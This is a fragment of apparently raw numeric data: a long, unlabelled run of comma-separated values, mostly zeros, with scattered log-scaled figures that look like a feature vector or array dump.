0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 2.3978952727983707, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0,\n 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 2.1972245773362196, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.6931471805599453, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381,\n 0.0, 0.0, 0.0, 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 17.287514144901962, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.70805020110221, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 4.189654742026425, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 3.58351893845611,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.1972245773362196, \n 1.7412592803704001, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.06534854782536, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 13.660472509367466, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, \n 3.7369991058576035, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 